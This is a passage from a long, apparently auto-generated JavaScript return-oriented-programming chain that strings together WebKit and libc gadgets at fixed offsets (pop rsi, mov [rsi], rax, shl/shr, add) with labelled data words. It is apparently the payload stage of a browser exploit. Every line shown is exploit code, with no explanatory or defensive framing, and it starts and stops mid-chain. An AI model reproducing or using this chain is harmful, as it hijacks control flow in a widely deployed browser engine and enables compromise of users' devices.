ropchain+585280, //L12986
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+585264, //L12985
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12985:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12986:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+585376, //L12988
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L12987:
db([4294959104, 4294967295]); // -0x2000
set_gadget(libc_base+759608,); //pop rax
//L12988:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+585456, //L12990
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12990:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+585512, //L12991
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12991:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L12993:
db([2, 0]); // 0x2
set_gadget(libc_base+763368,); //pop rcx
//L12994:
db([2, 0]); // 0x2
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+585664, //L12996
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12996:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+585720, //L12997
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12997:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+585792, //L13000
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13000:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+585848, //L13001
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13001:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+1121481, //mov [rax], cl
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+585936, //L13003
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L13003:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L13004:
db([4, 0]); // 0x4
set_gadget(libc_base+144605,); //pop rdi
//L13005:
db([4, 0]); // 0x4
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+586128, //L13009
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+586096, //L13007
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+586112, //L13008
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L13006:
db([56, 0]); // 0x38
set_gadget(webkit_base+3236123,); //pop r9
//L13007:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L13008:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L13009:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+586232, //L13011
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+586216, //L13010
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L13010:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L13011:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+586328, //L13013
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L13012:
db([4294959104, 4294967295]); // -0x2000
set_gadget(libc_base+759608,); //pop rax
//L13013:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+586408, //L13015
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13015:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+586464, //L13016
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13016:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L13018:
db([3, 0]); // 0x3
set_gadget(libc_base+763368,); //pop rcx
//L13019:
db([3, 0]); // 0x3
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+586616, //L13021
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13021:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+586672, //L13022
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13022:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+586744, //L13025
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13025:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+586800, //L13026
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13026:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+1121481, //mov [rax], cl
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+586888, //L13028
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L13028:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L13029:
db([65, 0]); // 0x41
set_gadget(libc_base+144605,); //pop rdi
//L13030:
db([65, 0]); // 0x41
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+587080, //L13034
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+587048, //L13032
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+587064, //L13033
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L13031:
db([56, 0]); // 0x38
set_gadget(webkit_base+3236123,); //pop r9
//L13032:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L13033:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L13034:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+587184, //L13036
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+587168, //L13035
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L13035:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L13036:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+587280, //L13038
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L13037:
db([4294959104, 4294967295]); // -0x2000
set_gadget(libc_base+759608,); //pop rax
//L13038:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+587360, //L13040
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13040:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+587416, //L13041
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13041:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L13043:
db([7, 0]); // 0x7
set_gadget(libc_base+763368,); //pop rcx
//L13044:
db([7, 0]); // 0x7
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+587568, //L13046
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13046:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+587624, //L13047
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13047:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+587696, //L13050
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13050:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+587752, //L13051
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13051:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+1121481, //mov [rax], cl
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+587896, //L13055
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+587880, //L13054
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L13053:
db([56, 0]); // 0x38
set_gadget(webkit_base+3236123,); //pop r9
//L13054:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L13055:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+588080, //L13058
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+588096, //L13059
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+588048, //L13056
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+588064, //L13057
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L13056:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L13057:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L13058:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L13059:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+588256, //L13063
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+588224, //L13061
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+588240, //L13062
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L13060:
db([56, 0]); // 0x38
set_gadget(webkit_base+3236123,); //pop r9
//L13061:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L13062:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L13063:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+588360, //L13065
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+588344, //L13064
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L13064:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L13065:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+588456, //L13067
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L13066:
db([4294959104, 4294967295]); // -0x2000
set_gadget(libc_base+759608,); //pop rax
//L13067:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+588536, //L13069
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13069:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+588592, //L13070
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13070:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L13072:
db([6, 0]); // 0x6
set_gadget(libc_base+763368,); //pop rcx
//L13073:
db([6, 0]); // 0x6
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+588744, //L13075
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13075:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+588800, //L13076
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13076:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+588872, //L13079
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13079:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+588928, //L13080
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13080:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+1121481, //mov [rax], cl
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+589072, //L13084
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+589056, //L13083
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L13082:
db([56, 0]); // 0x38
set_gadget(webkit_base+3236123,); //pop r9
//L13083:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L13084:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+589256, //L13087
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+589272, //L13088
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+589224, //L13085
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+589240, //L13086
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L13085:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L13086:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L13087:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L13088:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+589432, //L13092
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+589400, //L13090
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+589416, //L13091
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L13089:
db([56, 0]); // 0x38
set_gadget(webkit_base+3236123,); //pop r9
//L13090:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L13091:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L13092:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+589536, //L13094
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+589520, //L13093
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L13093:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L13094:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+589632, //L13096
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L13095:
db([4294959104, 4294967295]); // -0x2000
set_gadget(libc_base+759608,); //pop rax
//L13096:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+589712, //L13098
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13098:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+589768, //L13099
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13099:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L13101:
db([5, 0]); // 0x5
set_gadget(libc_base+763368,); //pop rcx
//L13102:
db([5, 0]); // 0x5
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+589920, //L13104
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13104:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+589976, //L13105
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13105:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+590048, //L13108
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13108:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+590104, //L13109
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13109:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+1121481, //mov [rax], cl
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+590248, //L13113
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+590232, //L13112
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L13111:
db([56, 0]); // 0x38
set_gadget(webkit_base+3236123,); //pop r9
//L13112:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L13113:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+590432, //L13116
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+590448, //L13117
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+590400, //L13114
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+590416, //L13115
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L13114:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L13115:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L13116:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L13117:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+590608, //L13121
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+590576, //L13119
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+590592, //L13120
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L13118:
db([56, 0]); // 0x38
set_gadget(webkit_base+3236123,); //pop r9
//L13119:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L13120:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L13121:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+590712, //L13123
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+590696, //L13122
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L13122:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L13123:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+590808, //L13125
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L13124:
db([4294959104, 4294967295]); // -0x2000
set_gadget(libc_base+759608,); //pop rax
//L13125:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+590888, //L13127
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13127:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+590944, //L13128
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13128:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L13130:
db([4, 0]); // 0x4
set_gadget(libc_base+763368,); //pop rcx
//L13131:
db([4, 0]); // 0x4
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+591096, //L13133
